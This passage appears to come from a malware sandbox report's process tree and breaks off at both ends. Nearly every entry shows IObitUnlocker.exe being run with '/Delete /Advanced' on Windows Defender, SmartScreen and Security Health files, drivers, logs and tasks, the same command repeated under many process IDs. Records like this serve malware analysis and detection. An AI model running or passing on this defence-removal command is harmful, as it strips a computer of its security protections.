Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:9880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10056
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8360
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 